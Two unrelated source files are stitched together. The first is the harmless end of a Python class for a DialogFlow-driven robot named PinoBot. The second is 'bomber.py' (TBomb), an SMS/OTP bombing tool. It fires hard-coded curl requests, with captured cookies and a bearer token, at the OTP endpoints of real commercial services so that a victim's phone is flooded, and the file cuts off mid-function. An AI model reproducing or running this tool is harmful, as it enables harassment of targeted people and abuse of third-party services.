self.state = PinoState.SENSOR_OFF
self.detect["pre_state"] = cur_sensor_state # update sensor state
return self.state
def listen(self):
"""
Description
-----------
start audio recording and streaming and return response
if google cloud error occurs, display to OLED
Return
------
response : { Parsed DialogFlow response , PinoResponse object}
"""
self.log.info("listen")
        self.hardware.write(text="듣는중")  # "Listening"
        # 2.1. streaming voice
        if self.cloud.start_stream() == -1:
            self.hardware.write(text="녹음 실패\n ㅠㅠ")  # "Recording failed"
            return None
        self.hardware.write(text="듣는중..")  # "Listening.."
try:
response = self.cloud.get_stream_response()
if response.stt_result == "[Fail]":
self.state = PinoState.LISTEN_FAIL
return None
# 2.E0. Gcloud Error
if self.cloud.gcloud_state < 0:
self.state = PinoState.LISTEN_CLOUD_ERROR
                if self.cloud.gcloud_state == -1:  # internet error
                    self.hardware.write(text="인터넷 문제\n 가 있어요 ㅠㅠ ")  # "There is an internet problem"
                elif self.cloud.gcloud_state == -2:  # Google server error (same message shown to the user)
                    self.hardware.write(text="인터넷 문제\n 가 있어요 ㅠㅠ ")  # "There is an internet problem"
                elif self.cloud.gcloud_state == -3:  # quota exceeded
                    self.hardware.write(text="오늘의 할당량을 \n 다 사용했네요 ㅠㅠ")  # "Today's quota has been used up"
                elif self.cloud.gcloud_state < -3:  # any other cloud error
                    self.hardware.write(text="무언가 문제가 있어요 \n ㅠㅠ")  # "Something is wrong"
self.log.warning("[PinoBot] cloud Error type : %d" % self.cloud.gcloud_state)
except Exception as E:
self.log.error("[PinoBot] listen Error : %s" % repr(E))
return None
else:
return response
def start_say(self, response):
"""
Description
-----------
pinobot say tts response
Parameters
----------
response : { Parsed DialogFlow response , PinoResponse object}
PinoResponse.tts_result is audio binary file .wav format
[TODO] add local wave file play feature
"""
if response is None:
self.log.warning("say.. nothing")
return 0
try:
self.say_thread = threading.Thread(
target=self.cloud.play_audio_response, args=(response,)
)
self.say_thread.start()
except Exception as E:
self.log.error("[PinoBot] say Error : %s" % repr(E))
return -1
def start_act(self, response):
"""
Description
-----------
pinobot do action by response.action_cmd
Notes
-----
        an action can take a few seconds, therefore it is run in a thread
        Parameters
        ----------
        response : { Parsed DialogFlow response , PinoResponse object}
            PinoResponse.action_cmd is a list of commands
        Return
        ------
        result : 0 Success
                -1 Fail
"""
if response is None:
self.log.warning('act.. nothing')
return 0
try:
self.act_thread = threading.Thread(
target=self.hardware.run_pinobot_cmd, args=(response,)
)
self.act_thread.start()
except Exception as E:
self.log.error("[PinoBot] act Error : %s" % repr(E))
return -1
else :
return 0
def wait_say_and_act(self,timeout = 30):
"""
Description
-----------
wait until say and act finish
Parameters
----------
timeout : seconds {int or float}
Return
------
        result : 0 Success
                -1 Fail (timed out)
        """
        self.state = PinoState.DO_SOMETHING
        if self.act_thread and self.say_thread:
            # poll every 10 ms until both threads finish or the timeout expires
            for _ in range(int(timeout * 100)):
                if self.act_thread.is_alive() or self.say_thread.is_alive():
                    time.sleep(0.01)
                else:
                    return 0
# [TODO] add flag to all thread and make ways to force stop.
return -1
def call_uart_event(self):
"""
Description
-----------
if pinobot's uart got some message,
use this to call dialogflow event
Notes
-----
uart_cmd : { dict }
{ event_name : $name ,
para1Name : $para1Value,
...
paraNName : $paraNValue,
}
Return
------
response : { Parsed DialogFlow response , PinoResponse object}
"""
try:
if self.uart_cmd is not None:
                self.hardware.write(text="메세지 확인중..")  # "Checking message.."
                response = self.cloud.send_event(self.uart_cmd['event_name'], self.uart_cmd)
self.uart_cmd = None # reset
self.state = PinoState.IDLE
self.hardware.write(serial_msg = "ready")
return response
else:
self.hardware.write(serial_msg = "ready")
return self.cloud.parsing_response(None,None,None)
except Exception as E:
self.log.error("[PinoBot] call_uart_event Error : %s" % repr(E))
return None
def call_intent(self,text = "" ,event_name="", event_parameter=None):
"""
Description
-----------
call dialogflow manually by dict or text, and get responses
Parameters
----------
text : natural word message to call dialogflow { str, optional }
event_name : dialogflow intent event name { str, optional }
event_parameter : dialogflow intent parameter { dict, optional }
event_parameter without event_name is useless
Return
------
response : { Parsed DialogFlow response , PinoResponse object}
Example
-------
        r = bot.call_intent(text='안녕하세요')            # "Hello"
        print(r.intent_response)
        >> 반갑습니다 저는 피노봇입니다                    # "Nice to meet you, I am PinoBot"
        r = bot.call_intent(event_name='weather',
                            event_parameter={'humidity': '50', 'temp': '20'})
        print(r.intent_response)
        >> 지금 방의 상태를 알려드립니다, 습도는 50프로 온도는 20도입니다.
           # "Here is the state of the room: humidity 50%, temperature 20 degrees."
        """
        try:
            if event_name != "":
                self.cloud.send_event(event_name, event_parameter)
self.cloud.send_event(event_name, event_parameter)
return self.cloud.parsing_response()
except Exception as E:
self.log.error("[PinoBot] call_intent Error : %s" % repr(E))
return None
def return_idle(self):
"""
Description
-----------
display idle message and
return state to idle
"""
        self.hardware.write(text="대기중..")  # "Idle.."
self.state = PinoState.IDLE
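# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative only, not part of the original module).
# It assumes the default base_path layout and working hardware/cloud modules,
# and simply strings together the public methods summarised in the class
# docstring above.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    bot = PinoBot()  # assumes the default /home/pi/Desktop/PinoBot/ install
    while True:
        state = bot.update()  # poll the sonic sensor and UART
        if state == PinoState.SENSOR_ON:
            # someone stepped in front of the robot: listen, then speak/act
            response = bot.listen()
            bot.start_say(response)
            bot.start_act(response)
            bot.wait_say_and_act(timeout=30)
            bot.return_idle()
        elif state == PinoState.UART_ON:
            # a serial command arrived: turn it into a DialogFlow event
            response = bot.call_uart_event()
            bot.start_say(response)
            bot.start_act(response)
            bot.wait_say_and_act(timeout=30)
            bot.return_idle()
        time.sleep(0.05)  # avoid busy-waiting between polls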
|
bomber.py
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To Sparkz-technology
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
████████ ██████ ██
▒▒▒██▒▒▒ ██▒▒▒██ ██
██ ██ ██ ████ ██ ██ ██
██ ██████▒ ██▒▒██ ███ ███ █████
██ ██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██
██ ██ ██ ██ ██ ██ ▒ ██ ██ ██
██ ██████▒ ▒████▒ ██ ██ █████▒
▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, max):
global count_inf
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo Sparkz >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
res = False
try:
requests.get('https://www.google.com', verify=True)
res = False
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tTBomb Will Stop Now...\n\n')
banner()
exit()
def getapi(pn, lim, cc):
global country_codes
cc = str(cc).strip()
cnn = country_codes[cc]
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
os.system('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno=' + pn + '&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1')
return True
elif lim == 4:
os.system(
'curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"' + pn + '","country_code":"' + cc + '"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1')
return True
elif lim == 5:
os.system('curl -s -X POST -H "Accept:*/*" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.5" -H "Connection:keep-alive" -H "Content-Length:34" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:www.oriyamatrimony.com" -H "Referer:https://www.oriyamatrimony.com/" -H "User-Agent:Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0" -H "X-Requested-With:XMLHttpRequest" -d "countrycode=' +
cc + '&mobileno=' + pn + '" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1')
return True
elif lim == 6:
os.system(
'curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+' + cc + pn + '"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1')
return True
elif lim == 7:
os.system('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+' + cc + pn + '&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1')
return True
elif lim == 8:
os.system('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile=' + pn + '&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1')
return True
elif lim == 9:
rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
os.system(
'curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"' + pn + '","UserName":"' + pn + '","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1')
return True
elif lim == 11:
os.system('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl=' + pn + '" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1')
return True
elif lim == 12:
os.popen('rm temp.xxx1 > /dev/null 2>&1')
os.system(
'curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile=' + pn + '\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1')
while not os.path.exists('temp.xxx1'):
time.sleep(0.1)
rd = str(open('temp.xxx1', 'rb').read()) + " "
return rd.find("sent") != -1
elif lim == 13:
rd = ' '
try:
rd = os.popen(
' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"' + pn + '","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read()
except Exception:
return True
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
con = '{"country_code":"' + cc + '","phone_number":"' + pn + '"}'
os.popen('rm temp.xxx2 > /dev/null 2>&1')
os.system('curl -s -X POST -H "Host:api.cloud.altbalaji.com" -H "Connection:keep-alive" -H "Content-Length:' + str(len(con)) +
'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \'' + con + '\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2')
while not os.path.exists('temp.xxx2'):
time.sleep(0.1)
rd = hashlib.md5(open('temp.xxx2', 'rb').read()).hexdigest()
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
